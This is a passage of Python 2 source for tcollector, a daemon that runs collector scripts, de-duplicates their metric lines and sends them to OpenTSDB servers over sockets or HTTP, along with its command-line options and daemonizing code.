self.put(value, False)\n except Full:\n LOG.error(""DROPPED LINE: %s"", value)\n return False\n return True\n\n\nclass Collector(object):\n """"""A Collector is a script that is run that gathers some data\n and prints it out in standard TSD format on STDOUT. This\n class maintains all of the state information for a given\n collector and gives us utility methods for working with\n it.""""""\n\n def __init__(self, colname, interval, filename, mtime=0, lastspawn=0):\n """"""Construct a new Collector.""""""\n self.name = colname\n self.interval = interval\n self.filename = filename\n self.lastspawn = lastspawn\n self.proc = None\n self.nextkill = 0\n self.killstate = 0\n self.dead = False\n self.mtime = mtime\n self.generation = GENERATION\n self.buffer = """"\n self.datalines = []\n # Maps (metric, tags) to (value, repeated, line, timestamp) where:\n # value: Last value seen.\n # repeated: boolean, whether the last value was seen more than once.\n # line: The last line that was read from that collector.\n # timestamp: Time at which we saw the value for the first time.\n # This dict is used to keep track of and remove duplicate values.\n # Since it might grow unbounded (in case we see many different\n # combinations of metrics and tags) someone needs to regularly call\n # evict_old_keys() to remove old entries.\n self.values = {}\n self.lines_sent = 0\n self.lines_received = 0\n self.lines_invalid = 0\n self.last_datapoint = int(time.time())\n\n def read(self):\n """"""Read bytes from our subprocess and store them in our temporary\n line storage buffer. This needs to be non-blocking.""""""\n\n # we have to use a buffer because sometimes the collectors\n # will write out a bunch of data points at one time and we\n # get some weird sized chunk. This read call is non-blocking.\n\n # now read stderr for log messages, we could buffer here but since\n # we\'re just logging the messages, I don\'t care to\n try:\n out = self.proc.stderr.read()\n if out:\n LOG.debug(\'reading %s got %d bytes on stderr\',\n self.name, len(out))\n for line in out.splitlines():\n LOG.warning(\'%s: %s\', self.name, line)\n except IOError, (err, msg):\n if err != errno.EAGAIN:\n raise\n except:\n LOG.exception(\'uncaught exception in stderr read\')\n\n # we have to use a buffer because sometimes the collectors will write\n # out a bunch of data points at one time and we get some weird sized\n # chunk. This read call is non-blocking.\n try:\n self.buffer += self.proc.stdout.read()\n if len(self.buffer):\n LOG.debug(\'reading %s, buffer now %d bytes\',\n self.name, len(self.buffer))\n except IOError, (err, msg):\n if err != errno.EAGAIN:\n raise\n except AttributeError:\n # sometimes the process goes away in another thread and we don\'t\n # have it anymore, so log an error and bail\n LOG.exception(\'caught exception, collector process went away while reading stdout\')\n except:\n LOG.exception(\'uncaught exception in stdout read\')\n return\n\n # iterate for each line we have\n while self.buffer:\n idx = self.buffer.find(\'\\n\')\n if idx == -1:\n break\n\n # one full line is now found and we can pull it out of the buffer\n line = self.buffer[0:idx].strip()\n if line:\n self.datalines.append(line)\n self.last_datapoint = int(time.time())\n self.buffer = self.buffer[idx+1:]\n\n def collect(self):\n """"""Reads input from the collector and returns the lines up to whomever\n is calling us. 
This is a generator that returns a line as it\n becomes available.""""""\n\n while self.proc is not None:\n self.read()\n if not len(self.datalines):\n return\n while len(self.datalines):\n yield self.datalines.pop(0)\n\n def shutdown(self):\n """"""Cleanly shut down the collector""""""\n\n if not self.proc:\n return\n try:\n if self.proc.poll() is None:\n kill(self.proc)\n for attempt in range(5):\n if self.proc.poll() is not None:\n return\n LOG.info(\'Waiting %ds for PID %d (%s) to exit...\'\n % (5 - attempt, self.proc.pid, self.name))\n time.sleep(1)\n kill(self.proc, signal.SIGKILL)\n self.proc.wait()\n except:\n # we really don\'t want to die as we\'re trying to exit gracefully\n LOG.exception(\'ignoring uncaught exception while shutting down\')\n\n def evict_old_keys(self, cut_off):\n """"""Remove old entries from the cache used to detect duplicate values.\n\n Args:\n cut_off: A UNIX timestamp. Any value that\'s older than this will be\n removed from the cache.\n """"""\n for key in self.values.keys():\n time = self.values[key][3]\n if time < cut_off:\n del self.values[key]\n\n\nclass StdinCollector(Collector):\n """"""A StdinCollector simply reads from STDIN and provides the\n data. This collector presents a uniform interface for the\n ReaderThread, although unlike a normal collector, read()/collect()\n will be blocking.""""""\n\n def __init__(self):\n super(StdinCollector, self).__init__(\'stdin\', 0, \'\')\n\n # hack to make this work. nobody else will rely on self.proc\n # except as a test in the stdin mode.\n self.proc = True\n\n def read(self):\n """"""Read lines from STDIN and store them. We allow this to\n be blocking because there should only ever be one\n StdinCollector and no normal collectors, so the ReaderThread\n is only serving us and we\'re allowed to block it.""""""\n\n global ALIVE\n line = sys.stdin.readline()\n if line:\n self.datalines.append(line.rstrip())\n else:\n ALIVE = False\n\n\n def shutdown(self):\n\n pass\n\n\nclass ReaderThread(threading.Thread):\n """"""The main ReaderThread is responsible for reading from the collectors\n and assuring that we always read from the input no matter what.\n All data read is put into the self.readerq Queue, which is\n consumed by the SenderThread.""""""\n\n def __init__(self, dedupinterval, evictinterval):\n """"""Constructor.\n Args:\n dedupinterval: If a metric sends the same value over successive\n intervals, suppress sending the same value to the TSD until\n this many seconds have elapsed. This helps graphs over narrow\n time ranges still see timeseries with suppressed datapoints.\n evictinterval: In order to implement the behavior above, the\n code needs to keep track of the last value seen for each\n combination of (metric, tags). Values older than\n evictinterval will be removed from the cache to save RAM.\n Invariant: evictinterval > dedupinterval\n """"""\n assert evictinterval > dedupinterval, ""%r <= %r"" % (evictinterval,\n dedupinterval)\n super(ReaderThread, self).__init__()\n\n self.readerq = ReaderQueue(MAX_READQ_SIZE)\n self.lines_collected = 0\n self.lines_dropped = 0\n self.dedupinterval = dedupinterval\n self.evictinterval = evictinterval\n\n def run(self):\n """"""Main loop for this thread. Just reads from collectors,\n does our input processing and de-duping, and puts the data\n into the queue.""""""\n\n LOG.debug(""ReaderThread up and running"")\n\n lastevict_time = 0\n # we loop every second for now. 
ideally we\'ll setup some\n # select or other thing to wait for input on our children,\n # while breaking out every once in a while to setup selects\n # on new children.\n while ALIVE:\n for col in all_living_collectors():\n for line in col.collect():\n self.process_line(col, line)\n\n if self.dedupinterval != 0: # if 0 we do not use dedup\n now = int(time.time())\n if now - lastevict_time > self.evictinterval:\n lastevict_time = now\n now -= self.evictinterval\n for col in all_collectors():\n col.evict_old_keys(now)\n\n # and here is the loop that we really should get rid of, this\n # just prevents us from spinning right now\n time.sleep(1)\n\n def process_line(self, col, line):\n """"""Parses the given line and appends the result to the reader queue.""""""\n\n self.lines_collected += 1\n\n col.lines_received += 1\n if len(line) >= 1024: # Limit in net.opentsdb.tsd.PipelineFactory\n LOG.warning(\'%s line too long: %s\', col.name, line)\n col.lines_invalid += 1\n return\n parsed = re.match(\'^([-_./a-zA-Z0-9]+)\\s+\' # Metric name.\n \'(\\d+\\.?\\d+)\\s+\' # Timestamp.\n \'(\\S+?)\' # Value (int or float).\n \'((?:\\s+[-_./a-zA-Z0-9]+=[-_./a-zA-Z0-9]+)*)$\', # Tags\n line)\n if parsed is None:\n LOG.warning(\'%s sent invalid data: %s\', col.name, line)\n col.lines_invalid += 1\n return\n metric, timestamp, value, tags = parsed.groups()\n timestamp = int(timestamp)\n\n # If there are more than 11 digits we\'re dealing with a timestamp\n # with millisecond precision\n if len(str(timestamp)) > 11:\n global MAX_REASONABLE_TIMESTAMP\n MAX_REASONABLE_TIMESTAMP = MAX_REASONABLE_TIMESTAMP * 1000\n\n # De-dupe detection... To reduce the number of points we send to the\n # TSD, we suppress sending values of metrics that don\'t change to\n # only once every 10 minutes (which is also when TSD changes rows\n # and how much extra time the scanner adds to the beginning/end of a\n # graph interval in order to correctly calculate aggregated values).\n # When the values do change, we want to first send the previous value\n # with what the timestamp was when it first became that value (to keep\n # slopes of graphs correct).\n #\n if self.dedupinterval != 0: # if 0 we do not use dedup\n key = (metric, tags)\n if key in col.values:\n # if the timestamp isn\'t > than the previous one, ignore this value\n if timestamp <= col.values[key][3]:\n LOG.error(""Timestamp out of order: metric=%s%s,""\n "" old_ts=%d >= new_ts=%d - ignoring data point""\n "" (value=%r, collector=%s)"", metric, tags,\n col.values[key][3], timestamp, value, col.name)\n col.lines_invalid += 1\n return\n elif timestamp >= MAX_REASONABLE_TIMESTAMP:\n LOG.error(""Timestamp is too far out in the future: metric=%s%s""\n "" old_ts=%d, new_ts=%d - ignoring data point""\n "" (value=%r, collector=%s)"", metric, tags,\n col.values[key][3], timestamp, value, col.name)\n return\n\n # if this data point is repeated, store it but don\'t send.\n # store the previous timestamp, so when/if this value changes\n # we send the timestamp when this metric first became the current\n # value instead of the last. Fall through if we reach\n # the dedup interval so we can print the value.\n if (col.values[key][0] == value and\n (timestamp - col.values[key][3] < self.dedupinterval)):\n col.values[key] = (value, True, line, col.values[key][3])\n return\n\n # we might have to append two lines if the value has been the same\n # for a while and we\'ve skipped one or more values. 
we need to\n # replay the last value we skipped (if changed) so the jumps in\n # our graph are accurate,\n if ((col.values[key][1] or\n (timestamp - col.values[key][3] >= self.dedupinterval))\n and col.values[key][0] != value):\n col.lines_sent += 1\n if not self.readerq.nput(col.values[key][2]):\n self.lines_dropped += 1\n\n # now we can reset for the next pass and send the line we actually\n # want to send\n # col.values is a dict of tuples, with the key being the metric and\n # tags (essentially the same as wthat TSD uses for the row key).\n # The array consists of:\n # [ the metric\'s value, if this value was repeated, the line of data,\n # the value\'s timestamp that it last changed ]\n col.values[key] = (value, False, line, timestamp)\n\n col.lines_sent += 1\n if not self.readerq.nput(line):\n self.lines_dropped += 1\n\n\nclass SenderThread(threading.Thread):\n """"""The SenderThread is responsible for maintaining a connection\n to the TSD and sending the data we\'re getting over to it. This\n thread is also responsible for doing any sort of emergency\n buffering we might need to do if we can\'t establish a connection\n and we need to spool to disk. That isn\'t implemented yet.""""""\n\n def __init__(self, reader, dryrun, hosts, self_report_stats, tags,\n reconnectinterval=0, http=False, http_username=None,\n http_password=None, ssl=False, maxtags=8):\n """"""Constructor.\n\n Args:\n reader: A reference to a ReaderThread instance.\n dryrun: If true, data points will be printed on stdout instead of\n being sent to the TSD.\n hosts: List of (host, port) tuples defining list of TSDs\n self_report_stats: If true, the reader thread will insert its own\n stats into the metrics reported to TSD, as if those metrics had\n been read from a collector.\n http: A boolean that controls whether or not the http endpoint is used.\n ssl: A boolean that controls whether or not the http endpoint uses ssl.\n tags: A dictionary of tags to append for every data point.\n """"""\n super(SenderThread, self).__init__()\n\n self.dryrun = dryrun\n self.reader = reader\n self.tags = sorted(tags.items()) # dictionary transformed to list\n self.http = http\n self.http_username = http_username\n self.http_password = http_password\n self.ssl = ssl\n self.hosts = hosts # A list of (host, port) pairs.\n # Randomize hosts to help even out the load.\n random.shuffle(self.hosts)\n self.blacklisted_hosts = set() # The \'bad\' (host, port) pairs.\n self.current_tsd = -1 # Index in self.hosts where we\'re at.\n self.host = None # The current TSD host we\'ve selected.\n self.port = None # The port of the current TSD.\n self.tsd = None # The socket connected to the aforementioned TSD.\n self.last_verify = 0\n self.reconnectinterval = reconnectinterval # in seconds.\n self.time_reconnect = 0 # if reconnectinterval > 0, used to track the time.\n self.sendq = []\n self.self_report_stats = self_report_stats\n self.maxtags = maxtags # The maximum number of tags TSD will accept.\n\n def pick_connection(self):\n """"""Picks up a random host/port connection.""""""\n # Try to get the next host from the list, until we find a host that\n # isn\'t in the blacklist, or until we run out of hosts (i.e. 
they\n # are all blacklisted, which typically happens when we lost our\n # connectivity to the outside world).\n for self.current_tsd in xrange(self.current_tsd + 1, len(self.hosts)):\n hostport = self.hosts[self.current_tsd]\n if hostport not in self.blacklisted_hosts:\n break\n else:\n LOG.info(\'No more healthy hosts, retry with previously blacklisted\')\n random.shuffle(self.hosts)\n self.blacklisted_hosts.clear()\n self.current_tsd = 0\n hostport = self.hosts[self.current_tsd]\n self.host, self.port = hostport\n LOG.info(\'Selected connection: %s:%d\', self.host, self.port)\n\n def blacklist_connection(self):\n """"""Marks the current TSD host we\'re trying to use as blacklisted.\n\n Blacklisted hosts will get another chance to be elected once there\n will be no more healthy hosts.""""""\n # FIXME: Enhance this naive strategy.\n LOG.info(\'Blacklisting %s:%s for a while\', self.host, self.port)\n self.blacklisted_hosts.add((self.host, self.port))\n\n def run(self):\n """"""Main loop. A simple scheduler. Loop waiting for 5\n seconds for data on the queue. If there\'s no data, just\n loop and make sure our connection is still open. If there\n is data, wait 5 more seconds and grab all of the pending data and\n send it. A little better than sending every line as its\n own packet.""""""\n\n errors = 0 # How many uncaught exceptions in a row we got.\n while ALIVE:\n try:\n self.maintain_conn()\n try:\n line = self.reader.readerq.get(True, 5)\n except Empty:\n continue\n self.sendq.append(line)\n time.sleep(5) # Wait for more data\n while True:\n # prevents self.sendq fast growing in case of sending fails\n # in send_data()\n if len(self.sendq) > MAX_SENDQ_SIZE:\n break\n try:\n line = self.reader.readerq.get(False)\n except Empty:\n break\n self.sendq.append(line)\n\n if ALIVE:\n self.send_data()\n errors = 0 # We managed to do a successful iteration.\n except (ArithmeticError, EOFError, EnvironmentError, LookupError,\n ValueError), e:\n errors += 1\n if errors > MAX_UNCAUGHT_EXCEPTIONS:\n shutdown()\n raise\n LOG.exception(\'Uncaught exception in SenderThread, ignoring\')\n time.sleep(1)\n continue\n except:\n LOG.exception(\'Uncaught exception in SenderThread, going to exit\')\n shutdown()\n raise\n\n def verify_conn(self):\n """"""Periodically verify that our connection to the TSD is OK\n and that the TSD is alive/working.""""""\n # http connections don\'t need this\n if self.http:\n return True\n\n if self.tsd is None:\n return False\n\n # if the last verification was less than a minute ago, don\'t re-verify\n if self.last_verify > time.time() - 60:\n return True\n\n # in case reconnect is activated, check if it\'s time to reconnect\n if self.reconnectinterval > 0 and self.time_reconnect < time.time() - self.reconnectinterval:\n # closing the connection and indicating that we need to reconnect.\n try:\n self.tsd.close()\n except socket.error, msg:\n pass # not handling that\n self.time_reconnect = time.time()\n return False\n\n # we use the version command as it is very low effort for the TSD\n # to respond\n LOG.debug(\'verifying our TSD connection is alive\')\n try:\n self.tsd.sendall(\'version\\n\')\n except socket.error, msg:\n self.tsd = None\n self.blacklist_connection()\n return False\n\n bufsize = 4096\n while ALIVE:\n # try to read as much data as we can. 
at some point this is going\n # to block, but we have set the timeout low when we made the\n # connection\n try:\n buf = self.tsd.recv(bufsize)\n except socket.error, msg:\n self.tsd = None\n self.blacklist_connection()\n return False\n\n # If we don\'t get a response to the `version\' request, the TSD\n # must be dead or overloaded.\n if not buf:\n self.tsd = None\n self.blacklist_connection()\n return False\n\n # Woah, the TSD has a lot of things to tell us... Let\'s make\n # sure we read everything it sent us by looping once more.\n if len(buf) == bufsize:\n continue\n\n # If everything is good, send out our meta stats. This\n # helps to see what is going on with the tcollector.\n # TODO need to fix this for http\n if self.self_report_stats:\n strs = [\n (\'reader.lines_collected\',\n \'\', self.reader.lines_collected),\n (\'reader.lines_dropped\',\n \'\', self.reader.lines_dropped)\n ]\n\n for col in all_living_collectors():\n strs.append((\'collector.lines_sent\', \'collector=\'\n + col.name, col.lines_sent))\n strs.append((\'collector.lines_received\', \'collector=\'\n + col.name, col.lines_received))\n strs.append((\'collector.lines_invalid\', \'collector=\'\n + col.name, col.lines_invalid))\n\n ts = int(time.time())\n strout = [""tcollector.%s %d %d %s""\n % (x[0], ts, x[2], x[1]) for x in strs]\n for string in strout:\n self.sendq.append(string)\n\n break # TSD is alive.\n\n # if we get here, we assume the connection is good\n self.last_verify = time.time()\n return True\n\n def maintain_conn(self):\n """"""Safely connect to the TSD and ensure that it\'s up and\n running and that we\'re not talking to a ghost connection\n (no response).""""""\n\n # dry runs and http are always good\n if self.dryrun or self.http:\n return\n\n # connection didn\'t verify, so create a new one. we might be in\n # this method for a long time while we sort this out.\n try_delay = 1\n while ALIVE:\n if self.verify_conn():\n return\n\n # increase the try delay by some amount and some random value,\n # in case the TSD is down for a while. 
delay at most\n # approximately 10 minutes.\n try_delay *= 1 + random.random()\n if try_delay > 600:\n try_delay *= 0.5\n LOG.debug(\'SenderThread blocking %0.2f seconds\', try_delay)\n time.sleep(try_delay)\n\n # Now actually try the connection.\n self.pick_connection()\n try:\n addresses = socket.getaddrinfo(self.host, self.port,\n socket.AF_UNSPEC,\n socket.SOCK_STREAM, 0)\n except socket.gaierror, e:\n # Don\'t croak on transient DNS resolution issues.\n if e[0] in (socket.EAI_AGAIN, socket.EAI_NONAME,\n socket.EAI_NODATA):\n LOG.debug(\'DNS resolution failure: %s: %s\', self.host, e)\n continue\n raise\n for family, socktype, proto, canonname, sockaddr in addresses:\n try:\n self.tsd = socket.socket(family, socktype, proto)\n self.tsd.settimeout(15)\n self.tsd.connect(sockaddr)\n # if we get here it connected\n LOG.debug(\'Connection to %s was successful\'%(str(sockaddr)))\n break\n except socket.error, msg:\n LOG.warning(\'Connection attempt failed to %s:%d: %s\',\n self.host, self.port, msg)\n self.tsd.close()\n self.tsd = None\n if not self.tsd:\n LOG.error(\'Failed to connect to %s:%d\', self.host, self.port)\n self.blacklist_connection()\n\n def add_tags_to_line(self, line):\n for tag, value in self.tags:\n if \' %s=\' % tag not in line:\n line += \' %s=%s\' % (tag, value)\n return line\n\n def send_data(self):\n """"""Sends outstanding data in self.sendq to the TSD in one operation.""""""\n if self.http:\n return self.send_data_via_http()\n\n # construct the output string\n out = \'\'\n\n # in case of logging we use less efficient variant\n if LOG.level == logging.DEBUG:\n for line in self.sendq:\n line = ""put %s"" % self.add_tags_to_line(line)\n out += line + ""\\n""\n LOG.debug(\'SENDING: %s\', line)\n else:\n out = """".join(""put %s\\n"" % self.add_tags_to_line(line) for line in self.sendq)\n\n if not out:\n LOG.debug(\'send_data no data?\')\n return\n\n # try sending our data. 
if an exception occurs, just error and\n        # try sending again next time.\n        try:\n            if self.dryrun:\n                print out\n            else:\n                self.tsd.sendall(out)\n            self.sendq = []\n        except socket.error, msg:\n            LOG.error(\'failed to send data: %s\', msg)\n            try:\n                self.tsd.close()\n            except socket.error:\n                pass\n            self.tsd = None\n            self.blacklist_connection()\n\n        # FIXME: we should be reading the result at some point to drain\n        # the packets out of the kernel\'s queue\n\n    def send_data_via_http(self):\n        """"""Sends outstanding data in self.sendq to TSD in one HTTP API call.""""""\n        metrics = []\n        for line in self.sendq:\n            # print "" %s"" % line\n            parts = line.split(None, 3)\n            # not all metrics have metric-specific tags\n            if len(parts) == 4:\n                (metric, timestamp, value, raw_tags) = parts\n            else:\n                (metric, timestamp, value) = parts\n                raw_tags = """"\n            # process the tags\n            metric_tags = {}\n            for tag in raw_tags.strip().split():\n                (tag_key, tag_value) = tag.split(""="", 1)\n                metric_tags[tag_key] = tag_value\n            metric_entry = {}\n            metric_entry[""metric""] = metric\n            metric_entry[""timestamp""] = long(timestamp)\n            metric_entry[""value""] = float(value)\n            metric_entry[""tags""] = dict(self.tags).copy()\n            if len(metric_tags) + len(metric_entry[""tags""]) > self.maxtags:\n                metric_tags_orig = set(metric_tags)\n                # keep only as many collector-supplied tags as still fit under\n                # maxtags; a dict cannot be sliced, so slice its key list\n                subset_metric_keys = frozenset(list(metric_tags)[:self.maxtags - len(metric_entry[""tags""])])\n                metric_tags = dict((k, v) for k, v in metric_tags.iteritems() if k in subset_metric_keys)\n                LOG.error(""Exceeding maximum permitted metric tags - removing %s for metric %s"",\n                          str(metric_tags_orig - set(metric_tags)), metric)\n            metric_entry[""tags""].update(metric_tags)\n            metrics.append(metric_entry)\n\n        if self.dryrun:\n            print ""Would have sent:\\n%s"" % json.dumps(metrics,\n                                                      sort_keys=True,\n                                                      indent=4)\n            return\n\n        self.pick_connection()\n        # print ""Using server: %s:%s"" % (self.host, self.port)\n        # url = ""http://%s:%s/api/put?details"" % (self.host, self.port)\n        # print ""Url is %s"" % url\n        LOG.debug(""Sending metrics to http://%s:%s/api/put?details"",\n                  self.host, self.port)\n        if self.ssl:\n            protocol = ""https""\n        else:\n            protocol = ""http""\n        req = urllib2.Request(""%s://%s:%s/api/put?details"" % (\n            protocol, self.host, self.port))\n        if self.http_username and self.http_password:\n            req.add_header(""Authorization"", ""Basic %s""\n                           % base64.b64encode(""%s:%s"" % (self.http_username, self.http_password)))\n        req.add_header(""Content-Type"", ""application/json"")\n        try:\n            response = urllib2.urlopen(req, json.dumps(metrics))\n            LOG.debug(""Received response %s"", response.getcode())\n            # clear out the sendq\n            self.sendq = []\n            # print ""Got response code: %s"" % response.getcode()\n            # print ""Content:""\n            # for line in response:\n            #     print line,\n            # print\n        except urllib2.HTTPError, e:\n            LOG.error(""Got error %s"", e)\n            # for line in http_error:\n            #     print line,\n\n\ndef setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None):\n    """"""Sets up logging and associated handlers.""""""\n\n    LOG.setLevel(logging.INFO)\n    if backup_count is not None and max_bytes is not None:\n        assert backup_count > 0\n        assert max_bytes > 0\n        ch = RotatingFileHandler(logfile, \'a\', max_bytes, backup_count)\n    else:  # Setup stream handler.\n        ch = logging.StreamHandler(sys.stdout)\n\n    ch.setFormatter(logging.Formatter(\'%(asctime)s %(name)s[%(process)d] \'\n                                      \'%(levelname)s: %(message)s\'))\n    LOG.addHandler(ch)\n\n\ndef parse_cmdline(argv):\n    """"""Parses the command-line.""""""\n\n    # get arguments\n    default_cdir = 
os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])),\n \'collectors\')\n parser = OptionParser(description=\'Manages collectors which gather \'\n \'data and report back.\')\n parser.add_option(\'-c\', \'--collector-dir\', dest=\'cdir\', metavar=\'DIR\',\n default=default_cdir,\n help=\'Directory where the collectors are located.\')\n parser.add_option(\'-d\', \'--dry-run\', dest=\'dryrun\', action=\'store_true\',\n default=False,\n help=\'Don\\\'t actually send anything to the TSD, \'\n \'just print the datapoints.\')\n parser.add_option(\'-D\', \'--daemonize\', dest=\'daemonize\', action=\'store_true\',\n default=False, help=\'Run as a background daemon.\')\n parser.add_option(\'-H\', \'--host\', dest=\'host\', default=\'localhost\',\n metavar=\'HOST\',\n help=\'Hostname to use to connect to the TSD.\')\n parser.add_option(\'-L\', \'--hosts-list\', dest=\'hosts\', default=False,\n metavar=\'HOSTS\',\n help=\'List of host:port to connect to tsd\\\'s (comma separated).\')\n parser.add_option(\'--no-tcollector-stats\', dest=\'no_tcollector_stats\',\n default=False, action=\'store_true\',\n help=\'Prevent tcollector from reporting its own stats to TSD\')\n parser.add_option(\'-s\', \'--stdin\', dest=\'stdin\', action=\'store_true\',\n default=False,\n help=\'Run once, read and dedup data points from stdin.\')\n parser.add_option(\'-p\', \'--port\', dest=\'port\', type=\'int\',\n default=DEFAULT_PORT, metavar=\'PORT\',\n help=\'Port to connect to the TSD instance on. \'\n \'default=%default\')\n parser.add_option(\'-v\', dest=\'verbose\', action=\'store_true\', default=False,\n help=\'Verbose mode (log debug messages).\')\n parser.add_option(\'-t\', \'--tag\', dest=\'tags\', action=\'append\',\n default=[], metavar=\'TAG\',\n help=\'Tags to append to all timeseries we send, \'\n \'e.g.: -t TAG=VALUE -t TAG2=VALUE\')\n parser.add_option(\'-P\', \'--pidfile\', dest=\'pidfile\',\n default=\'/var/run/tcollector.pid\',\n metavar=\'FILE\', help=\'Write our pidfile\')\n parser.add_option(\'--dedup-interval\', dest=\'dedupinterval\', type=\'int\',\n default=300, metavar=\'DEDUPINTERVAL\',\n help=\'Number of seconds in which successive duplicate \'\n \'datapoints are suppressed before sending to the TSD. \'\n \'Use zero to disable. \'\n \'default=%default\')\n parser.add_option(\'--evict-interval\', dest=\'evictinterval\', type=\'int\',\n default=6000, metavar=\'EVICTINTERVAL\',\n help=\'Number of seconds after which to remove cached \'\n \'values of old data points to save memory. \'\n \'default=%default\')\n parser.add_option(\'--allowed-inactivity-time\', dest=\'allowed_inactivity_time\', type=\'int\',\n default=ALLOWED_INACTIVITY_TIME, metavar=\'ALLOWEDINACTIVITYTIME\',\n help=\'How long to wait for datapoints before assuming \'\n \'a collector is dead and restart it. 
\'\n \'default=%default\')\n parser.add_option(\'--remove-inactive-collectors\', dest=\'remove_inactive_collectors\', action=\'store_true\',\n default=False, help=\'Remove collectors not sending data \'\n \'in the max allowed inactivity interval\')\n parser.add_option(\'--max-bytes\', dest=\'max_bytes\', type=\'int\',\n default=64 * 1024 * 1024,\n help=\'Maximum bytes per a logfile.\')\n parser.add_option(\'--backup-count\', dest=\'backup_count\', type=\'int\',\n default=0, help=\'Maximum number of logfiles to backup.\')\n parser.add_option(\'--logfile\', dest=\'logfile\', type=\'str\',\n default=DEFAULT_LOG,\n help=\'Filename where logs are written to.\')\n parser.add_option(\'--reconnect-interval\',dest=\'reconnectinterval\', type=\'int\',\n default=0, metavar=\'RECONNECTINTERVAL\',\n help=\'Number of seconds after which the connection to\'\n \'the TSD hostname reconnects itself. This is useful\'\n \'when the hostname is a multiple A record (RRDNS).\'\n )\n parser.add_option(\'--max-tags\', dest=\'maxtags\', type=int, default=8,\n help=\'The maximum number of tags to send to our TSD Instances\')\n parser.add_option(\'--http\', dest=\'http\', action=\'store_true\', default=False,\n help=\'Send the data via the http interface\')\n parser.add_option(\'--http-username\', dest=\'http_username\', default=False,\n help=\'Username to use for HTTP Basic Auth when sending the data via HTTP\')\n parser.add_option(\'--http-password\', dest=\'http_password\', default=False,\n help=\'Password to use for HTTP Basic Auth when sending the data via HTTP\')\n parser.add_option(\'--ssl\', dest=\'ssl\', action=\'store_true\', default=False,\n help=\'Enable SSL - used in conjunction with http\')\n (options, args) = parser.parse_args(args=argv[1:])\n if options.dedupinterval < 0:\n parser.error(\'--dedup-interval must be at least 0 seconds\')\n if options.evictinterval <= options.dedupinterval:\n parser.error(\'--evict-interval must be strictly greater than \'\n \'--dedup-interval\')\n if options.reconnectinterval < 0:\n parser.error(\'--reconnect-interval must be at least 0 seconds\')\n # We cannot write to stdout when we\'re a daemon.\n if (options.daemonize or options.max_bytes) and not options.backup_count:\n options.backup_count = 1\n return (options, args)\n\n\ndef daemonize():\n """"""Performs the necessary dance to become a background daemon.""""""\n if os.fork():\n os._exit(0)\n os.chdir(""/"")\n os.umask(022)\n os.setsid()\n os.umask(0)\n if os.fork():\n os._exit(0)\n stdin = open(os.devnull)\n stdout = open(os.devnull, \'w\')\n os.dup2(stdin.fileno(), 0)\n os.dup2(stdout.fileno(), 1)\n os.dup2(stdout.fileno(), 2)\n stdin.close()\n stdout.close()\n os.umask(022)\n for fd in xrange(3, 1024):\n try:\n os.close(fd)\n except OSError: # This FD wasn\'t opened...\n pass # ... 
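# --- Sketch of the same double-fork daemonization dance in Python 3, with
# the intent of each step spelled out; it omits the umask shuffling and
# the descriptor sweep that daemonize() above also performs.

import os

def daemonize_sketch():
    if os.fork():           # parent returns to the shell; child carries on
        os._exit(0)
    os.chdir('/')           # don't keep any mount point busy
    os.setsid()             # new session: detach from the controlling tty
    if os.fork():           # second fork: survivor can never re-acquire a tty
        os._exit(0)
    devnull = os.open(os.devnull, os.O_RDWR)
    for fd in (0, 1, 2):    # stdin/stdout/stderr all point at /dev/null
        os.dup2(devnull, fd)
    os.close(devnull)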
ignore the exception.\n\n\ndef setup_python_path(collector_dir):\n """"""Sets up PYTHONPATH so that collectors can easily import common code.""""""\n mydir = os.path.dirname(collector_dir)\n libdir = os.path.join(mydir, \'collectors\', \'lib\')\n if not os.path.isdir(libdir):\n return\n pythonpath = os.environ.get(\'PYTHONPATH\', \'\')\n if pythonpath:\n pythonpath += \':\'\n pythonpath += mydir\n os.environ[\'PYTHONPATH\'] = pythonpath\n LOG.debug(\'Set PYTHONPATH to %r\', pythonpath)\n\n\ndef main(argv):\n """"""The main tcollector entry point and loop.""""""\n\n options, args = parse_cmdline(argv)\n if options.daemonize:\n daemonize()\n setup_logging(options.logfile, options.max_bytes or None,\n options.backup_count or None)\n\n if options.verbose:\n LOG.setLevel(logging.DEBUG) # up our level\n\n if options.pidfile:\n write_pid(options.pidfile)\n\n # validate everything\n tags = {}\n for tag in options.tags:\n if re.match(\'^[-_.a-z0-9]+=\\S+$\', tag, re.IGNORECASE) is None:\n assert False, \'Tag string ""%s"" is invalid.\' % tag\n k, v = tag.split(\'=\', 1)\n if k in tags:\n assert False, \'Tag ""%s"" already declared.\' % k\n tags[k] = v\n\n if not \'host\' in tags and not options.stdin:\n tags[\'host\'] = socket.gethostname()\n LOG.warning(\'Tag ""host"" not specified, defaulting to %s.\', tags[\'host\'])\n\n options.cdir = os.path.realpath(options.cdir)\n if not os.path.isdir(options.cdir):\n LOG.fatal(\'No such directory: %s\', options.cdir)\n return 1\n modules = load_etc_dir(options, tags)\n\n setup_python_path(options.cdir)\n\n # gracefully handle death for normal termination paths and abnormal\n atexit.register(shutdown)\n for sig in (signal.SIGTERM, signal.SIGINT):\n signal.signal(sig, shutdown_signal)\n\n # at this point we\'re ready to start processing, so start the ReaderThread\n # so we can have it running and pulling in data for us\n reader = ReaderThread(options.dedupinterval, options.evictinterval)\n reader.start()\n\n # prepare list of (host, port) of TSDs given on CLI\n if not options.hosts:\n options.hosts = [(options.host, options.port)]\n else:\n def splitHost(hostport):\n if "":"" in hostport:\n # Check if we have an IPv6 address.\n if hostport[0] == ""["" and ""]:"" in hostport:\n host, port = hostport.split(""]:"")\n host = host[1:]\n else:\n host, port = hostport.split("":"")\n return (host, int(port))\n return (hostport, DEFAULT_PORT)\n options.hosts = [splitHost(host) for host in options.hosts.split("","")]\n if options.host != ""localhost"" or options.port != DEFAULT_PORT:\n options.hosts.append((options.host, options.port))\n\n # and setup the sender to start writing out to the tsd\n sender = SenderThread(reader, options.dryrun, options.hosts,\n not options.no_tcollector_stats, tags, options.reconnectinterval,\n options.http, options.http_username,\n options.http_password, options.ssl, options.maxtags)\n sender.start()\n LOG.info(\'SenderThread startup complete\')\n\n # if we\'re in stdin mode, build a stdin collector and just join on the\n # reader thread since there\'s nothing else for us to do here\n if options.stdin:\n register_collector(StdinCollector())\n stdin_loop(options, modules, sender, tags)\n else:\n sys.stdin.close()\n main_loop(options, modules, sender, tags)\n\n # We\'re exiting, make sure we don\'t leave any collector behind.\n for col in all_living_collectors():\n col.shutdown()\n LOG.debug(\'Shutting down -- joining the reader thread.\')\n reader.join()\n LOG.debug(\'Shutting down -- joining the sender thread.\')\n sender.join()\n\ndef 
